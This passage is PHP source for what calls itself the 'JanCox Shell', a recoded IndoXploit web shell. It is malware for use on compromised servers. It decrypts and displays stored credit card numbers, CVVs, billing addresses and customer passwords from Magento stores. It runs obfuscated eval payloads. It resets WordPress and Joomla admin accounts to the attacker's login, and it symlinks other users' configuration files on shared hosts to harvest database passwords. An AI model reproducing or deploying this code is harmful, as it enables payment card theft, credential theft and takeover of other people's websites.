  720.     if(mysql_num_rows($query_smtp) != 0){  
  721.         if (!$query_smtp){  
  722.               echo "<center><b>Gagal</b></center>";  
  723.         }else{  
  724.               echo'<br><br>  
  725.                    ====================================================================<br>  
  726.                                    [ SMTP ] <br>  
  727.                    ====================================================================<br>';  
  728.         }  
  729.         echo "  
  730.        <table border='1' align='center' >  
  731.        <tr>  
  732.        <td>no</td>  
  733.        <td>host</td>          
  734.        <td>port</td>  
  735.        <td>user</td>  
  736.        <td>pass</td>      
  737.        </tr>";  
  738.             $no = 1;  
  739.             $batas = 0;  
  740.             while($rows = mysql_fetch_array($query_smtp)) {  
  741.                 $smtphost = $rows[0];  
  742.                 $smtpport = $rows[1];  
  743.                 $smtpuser = $rows[2];  
  744.                 $smtppass = $rows[3];  
  745.                 echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";  
  746.                 $no++;  
  747.             }  
  748.         echo "</table><br>";  
  749.     }  
  750.     //=========================================================================================================  
  751.     $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");  
  752.     $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  753.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){  
  754.           echo'<br><br>  
  755.                ====================================================================<br>  
  756.                                [ Credit Card ] <br>  
  757.                ====================================================================<br>';  
  758.             echo "  
  759.            <table border='1' align='left' >  
  760.            <tr>  
  761.            <td>no</td>  
  762.            <td>Date</td>  
  763.            <td>Credit Owner</td>  
  764.            <td>method</td>  
  765.            <td>Credit Number</td>  
  766.            <td>Credit Exp</td>  
  767.            <td>CVV</td>  
  768.            <td>Address</td>  
  769.            </tr>";  
  770.                 $no = 1;  
  771.                 $batas = 0;  
  772.                 while($vx = mysql_fetch_array($query)){  
  773.                 $date = $vx['updated_at'];  
  774.                 $cc_owner = $vx['cc_owner'];  
  775.                 $method = $vx['method'];  
  776.                 $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);  
  777.                 $exp = $vx['exp'];          
  778.                 $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);      
  779.                 $Billing_Address = $vx['Billing Address'];  
  780.                 echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";  
  781.                 $batas = $no++;  
  782.                 }  
  783.                  
  784.                 while($vx2 = mysql_fetch_array($query2)){  
  785.                     $batas +=1;  
  786.                 $cc_owner = $vx2['cc_owner'];  
  787.                 $method = $vx2['method'];  
  788.                 $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);  
  789.                 $exp = $vx2['exp'];          
  790.                 $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);  
  791.                 $Billing_Address = $vx2['Billing Address'];  
  792.                 echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";  
  793.                  $batas++;  
  794.                 }      
  795.                  
  796.             echo "</table><br>";      
  797.     }  
  798.     //=========================================================================================================  
  799.     $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");  
  800.     $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");  
  801.      
  802.      
  803.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){  
  804.         if (!$query){  
  805.               echo "<center><b>Gagal</b></center>";  
  806.         }else{  
  807.               echo'<br><br>  
  808.                    ====================================================================<br>  
  809.                                    [ Customer ] <br>  
  810.                    ====================================================================<br>';  
  811.         }  
  812.         echo "  
  813.        <table border='1' align='center' >  
  814.        <tr>  
  815.        <td>no</td>  
  816.        <td>user</td>  
  817.        <td>pass</td>      
  818.        </tr>";  
  819.             $no = 1;  
  820.             $batas = 0;  
  821.             while($vx = mysql_fetch_array($query)) {  
  822.                 $user = $vx['email'];  
  823.                 $pass = $vx['value'];  
  824.                 echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
  825.                 $batas = $no++;  
  826.             }  
  827.              
  828.             if(mysql_num_rows($query2) != 0 && ($query2)){  
  829.                 while($vx2 = mysql_fetch_array($query2)){  
  830.                     $user = $vx2['customer_email'];  
  831.                     $pass = $crypto->decrypt($vx2['password_hash']);  
  832.                     if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin  
  833.                         $batas +=1;  
  834.                         echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";  
  835.                         $batas++;  
  836.                     }  
  837.                 }                  
  838.             }  
  839.          
  840.         echo "</table><br>";  
  841.     }  
  842.     //=========================================================================================================  
  843.   }  
  844. }  
  845. function save($format,$data){  
  846.     $fp = fopen($format, 'a');  
  847.     fwrite($fp, $data);  
  848.     fclose($fp);  
  849. }  
  850. function cekbase64($string){  
  851.         $decoded = base64_decode($string, true);  
  852.         if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;  
  853.         if(!base64_decode($string, true)) return false;  
  854.         if(base64_encode($decoded) != $string) return false;  
  855.         return true;//nilai return 1 jika true  
  856.     }  
  857. //----untuk decode password ---/  
  858. class Varien_Crypt_Mcrypt{  
  859.     /**  
  860.      * Constuctor  
  861.      *  
  862.      * @param array $data  
  863.      */  
  864.     public function __construct()  
  865.     {  
  866.     }  
  867.  
  868.     /**  
  869.      * Initialize mcrypt module  
  870.      *  
  871.      * @param string $key cipher private key  
  872.      * @return Varien_Crypt_Mcrypt  
  873.      */  
  874.     public function init($key)  
  875.     {  
  876.         $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');  
  877.         $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);  
  878.         $maxKeySize = mcrypt_enc_get_key_size($this->handler);  
  879.  
  880.         if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {  
  881.             //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);  
  882.             return null;  
  883.         }  
  884.  
  885.         mcrypt_generic_init($this->handler, $key, $iv);  
  886.  
  887.         return $this;  
  888.     }  
  889.  
  890.     /**  
  891.      * Encrypt data  
  892.      *  
  893.      * @param string $data source string  
  894.      * @return string  
  895.      */  
  896.     public function encrypt($data)  
  897.     {  
  898.         if (!$this->handler) {  
  899.             //throw new Varien_Exception('Crypt module is not initialized.');  
  900.             return null;  
  901.         }  
  902.         if (strlen($data) == 0) {  
  903.             return $data;  
  904.         }  
  905.         return base64_encode(mcrypt_generic($this->handler, $data));  
  906.     }  
  907.  
  908.     /**  
  909.      * Decrypt data  
  910.      *  
  911.      * @param string $data encrypted string  
  912.      * @return string  
  913.      */  
  914.     public function decrypt($data)  
  915.     {  
  916.         if (!$this->handler) {  
  917.             //throw new Varien_Exception('Crypt module is not initialized.');  
  918.             return null;  
  919.         }  
  920.         if (strlen($data) == 0) {  
  921.             return $data;  
  922.         }  
  923.         return mdecrypt_generic($this->handler, base64_decode($data));  
  924.     }  
  925.          
  926.    
  927.     /**  
  928.      * Desctruct cipher module  
  929.      *  
  930.      */  
  931.     public function __destruct()  
  932.     {  
  933.         if ($this->handler) {  
  934.             $this->_reset();  
  935.         }  
  936.     }  
  937.  
  938.     protected function _reset()  
  939.     {  
  940.         mcrypt_generic_deinit($this->handler);  
  941.         mcrypt_module_close($this->handler);  
  942.     }  
  943. }  
  944. }
  945. elseif($_GET['do'] == 'zip') {
  946.     echo "<center><h1>Zip Menu</h1>";
  947. function rmdir_recursive($dir) {
  948.     foreach(scandir($dir) as $file) {
  949.        if ('.' === $file || '..' === $file) continue;
  950.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  951.        else unlink("$dir/$file");
  952.    }
  953.    rmdir($dir);
  954. }
  955. if($_FILES["zip_file"]["name"]) {
  956.     $filename = $_FILES["zip_file"]["name"];
  957.     $source = $_FILES["zip_file"]["tmp_name"];
  958.     $type = $_FILES["zip_file"]["type"];
  959.     $name = explode(".", $filename);
  960.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  961.     foreach($accepted_types as $mime_type) {
  962.         if($mime_type == $type) {
  963.             $okay = true;
  964.             break;
  965.         }
  966.     }
  967.     $continue = strtolower($name[1]) == 'zip' ? true : false;
  968.     if(!$continue) {
  969.         $message = "Itu Bukan Zip  , , GOBLOK COK";
  970.     }
  971.   $path = dirname(__FILE__).'/';
  972.   $filenoext = basename ($filename, '.zip');
  973.   $filenoext = basename ($filenoext, '.ZIP');
  974.   $targetdir = $path . $filenoext;
  975.   $targetzip = $path . $filename;
  976.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  977.   mkdir($targetdir, 0777);
  978.     if(move_uploaded_file($source, $targetzip)) {
  979.         $zip = new ZipArchive();
  980.         $x = $zip->open($targetzip);
  981.         if ($x === true) {
  982.             $zip->extractTo($targetdir);
  983.             $zip->close();
  984.  
  985.             unlink($targetzip);
  986.         }
  987.         $message = "<b>Sukses Gan :)</b>";
  988.     } else {   
  989.         $message = "<b>Error Gan :(</b>";
  990.     }
  991. }  
  992. echo '<table style="width:100%" border="1">
  993.  <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  994. <label>Zip File : <input type="file" name="zip_file" /></label>
  995. <input type="submit" name="submit" value="Upload And Unzip" />
  996. </form>';
  997. if($message) echo "<p>$message</p>";
  998. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";  
  999.     if($_POST['backup']){
  1000.     $save=$_POST['save'];
  1001.     function Zip($source, $destination)
  1002. {
  1003.     if (extension_loaded('zip') === true)
  1004.     {
  1005.         if (file_exists($source) === true)
  1006.         {
  1007.             $zip = new ZipArchive();
  1008.  
  1009.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1010.             {
  1011.                 $source = realpath($source);
  1012.  
  1013.                 if (is_dir($source) === true)
  1014.                 {
  1015.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1016.  
  1017.                     foreach ($files as $file)
  1018.                     {
  1019.                         $file = realpath($file);
  1020.  
  1021.                         if (is_dir($file) === true)
  1022.                         {
  1023.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1024.                         }
  1025.  
  1026.                         else if (is_file($file) === true)
  1027.                         {
  1028.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1029.                         }
  1030.                     }
  1031.                 }
  1032.  
  1033.                 else if (is_file($source) === true)
  1034.                 {
  1035.                     $zip->addFromString(basename($source), file_get_contents($source));
  1036.                 }
  1037.             }
  1038.  
  1039.             return $zip->close();
  1040.         }
  1041.     }
  1042.  
  1043.     return false;
  1044. }
  1045.     Zip($_POST['dir'],$save);
  1046.     echo "Done , Save To <b>$save</b>";
  1047.     }
  1048.     echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/cox_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1049.     if($_POST['extrak']){
  1050.     $save=$_POST['save'];
  1051.     $zip = new ZipArchive;
  1052.     $res = $zip->open($_POST['dir']);
  1053.     if ($res === TRUE) {
  1054.         $zip->extractTo($save);
  1055.         $zip->close();
  1056.     echo 'Succes , Location : <b>'.$save.'</b>';
  1057.     } else {
  1058.     echo 'Gagal Mas :( Ntahlah !';
  1059.     }
  1060.     }
  1061. echo '</tr></table>';  
  1062.     }
  1063.     elseif($_GET['do'] == 'shellchk') {
  1064.         eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
  1065.     } elseif($_GET['do'] == 'loghunter')
  1066.     {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}  
  1067. elseif($_GET['do'] == 'metu') {
  1068.    
  1069.  
  1070. echo '<form action="?dir=$dir&do=metu" method="post">';
  1071.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1072.     echo 'Byee !';
  1073.    
  1074. }
  1075. elseif($_GET['do'] == 'about') {
  1076.    
  1077.     echo '<center>JanCox Shell<hr>IndoXploit Shell Recoded By 0x1999<br>For More Script Visit <a href="http://cr1p.blogspot.com/">Here</a>';
  1078.    
  1079. }
  1080. elseif($_GET['do'] == 'auto_cu_wp') {
  1081. if($_POST['gass']) {
  1082.     echo "<center><h1>WordPress Auto Change User 2</h1>
  1083.         <form method='post'>
  1084.         Link Config: <br>
  1085.         <textarea name='link' style='width: 450px; height:250px;'>";
  1086.     UrlLoop($_POST['linkconf'],'wordpress');   
  1087.     echo"</textarea><br>
  1088.         <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1089.         </form></center>";
  1090. }   else {
  1091.         echo "<center><h1>WordPress Auto Change User 2</h1>
  1092.         <form method='post'>
  1093.         Link Config: <br>
  1094.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/cox_symconf/'><br>
  1095.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1096.         </form></center>";
  1097.     }
  1098. if($_POST['auto_cu_wp']) {
  1099.    
  1100.         function anucurl($sites) {
  1101.             $ch = curl_init($sites);
  1102.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1103.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1104.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1105.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1106.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1107.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1108.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1109.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1110.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1111.             $data = curl_exec($ch);
  1112.                   curl_close($ch);
  1113.             return $data;
  1114.         }
  1115.         $link = explode("\r\n", $_POST['link']);
  1116.         $user = "0x1999";
  1117.         $pass = "0x1999";
  1118.         $passx = md5($pass);
  1119.         foreach($link as $dir_config) {
  1120.             $config = anucurl($dir_config);
  1121.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  1122.             $dbuser = ambilkata($config,"DB_USER', '","'");
  1123.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1124.             $dbname = ambilkata($config,"DB_NAME', '","'");
  1125.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1126.             $prefix = $dbprefix."users";
  1127.             $option = $dbprefix."options";
  1128.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1129.             $db = mysql_select_db($dbname);
  1130.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1131.             $result = mysql_fetch_array($q);
  1132.             $id = $result[ID];
  1133.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1134.             $result2 = mysql_fetch_array($q2);
  1135.             $target = $result2[option_value];
  1136.             if($target == '') {                
  1137.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1138.             } else {
  1139.                 echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1140.             }
  1141.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1142.             if(!$conn OR !$db OR !$update) {
  1143.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1144.                 mysql_close($conn);
  1145.             } else {
  1146.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1147.                     echo "[+] username: <font color=lime>$user</font><br>";
  1148.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
  1149.                    
  1150.                 mysql_close($conn);
  1151.             }
  1152.         }
  1153.     }  
  1154.  
  1155. }
  1156. elseif($_GET['do'] == 'auto_cu_joomla') {
  1157. if($_POST['gass']) {
  1158.     echo "<center><h1>Joomla Auto Change User 2</h1>
  1159.         <form method='post'>
  1160.         Link Config: <br>
  1161.         <textarea name='link' style='width: 450px; height:250px;'>";
  1162.     UrlLoop($_POST['linkconf'],'joomla');  
  1163.     echo"</textarea><br>
  1164.         <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1165.         </form></center>";
  1166. }   else {
  1167.         echo "<center><h1>Joomla Auto Change User 2</h1>
  1168.         <form method='post'>
  1169.         Link Config: <br>
  1170.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/cox_symconf/'><br>
  1171.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1172.         </form></center>";
  1173.     }
  1174. if($_POST['auto_cu_joomla']) {
  1175.    
  1176.         function anucurl($sites) {
  1177.             $ch = curl_init($sites);
  1178.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1179.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1180.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1181.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1182.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1183.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1184.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1185.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1186.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1187.             $data = curl_exec($ch);
  1188.                   curl_close($ch);
  1189.             return $data;
  1190.         }
  1191.         $link = explode("\r\n", $_POST['link']);
  1192.         $user = "0x1999";
  1193.         $pass = "0x1999";
  1194.         $passx = md5($pass);
  1195.         foreach($link as $dir_config) {
  1196.             $config = anucurl($dir_config);
  1197.                     $dbhost = ambilkata($config,"host = '","'");
  1198.                     $dbuser = ambilkata($config,"user = '","'");
  1199.                     $dbpass = ambilkata($config,"password = '","'");
  1200.                     $dbname = ambilkata($config,"db = '","'");
  1201.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  1202.                     $prefix = $dbprefix."users";
  1203.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1204.                     $db = mysql_select_db($dbname);
  1205.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1206.                     $result = mysql_fetch_array($q);
  1207.                     $id = $result['id'];
  1208.                     $site = ambilkata($config,"sitename = '","'");
  1209.                     $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1210.                     echo "Config => ".$dir_config."<br>";
  1211.                     echo "CMS => Joomla<br>";
  1212.                     if($site == '') {
  1213.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1214.                     } else {
  1215.                         echo "Sitename => $site<br>";
  1216.                     }
  1217.                     if(!$update OR !$conn OR !$db) {
  1218.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1219.                     } else {
  1220.                         echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1221.                     }
  1222.                     mysql_close($conn);
  1223.                     }
  1224.     }  
  1225. }
  1226. elseif($_GET['do'] == 'symconfig') {
  1227. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1228. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  1229. exit;
  1230. }
  1231. else
  1232. {
  1233. if($_POST["m"] && !$_POST["passwd"]==""){
  1234. @mkdir("cox_symconf", 0777);
  1235. @chdir("cox_symconf");
  1236. @symlink("/","root");
  1237. $htaccess="Options Indexes FollowSymLinks
  1238. DirectoryIndex jancox.htm
  1239. AddType text/plain .php
  1240. AddHandler text/plain .php
  1241. Satisfy Any";
  1242. @file_put_contents(".htaccess",$htaccess);
  1243. $etc_passwd=$_POST["passwd"];
  1244. $etc_passwd=explode("\n",$etc_passwd);
  1245. foreach($etc_passwd as $passwd){
  1246. $pawd=explode(":",$passwd);
  1247. $user =$pawd[0];
  1248.  
  1249. @symlink('/','cox_symconf/root');
  1250. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1251. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1252. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1253. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1254. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1255. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1256. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1257. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1258. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1259. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1260. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1261. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1262. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1263. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1264. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1265. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1266. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1267. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1268. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1269. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1270. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1271. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1272. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1273. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1274. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1275. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1276. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1277. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1278. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1279. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1280. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1281. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1282. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1283. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1284. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1285. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
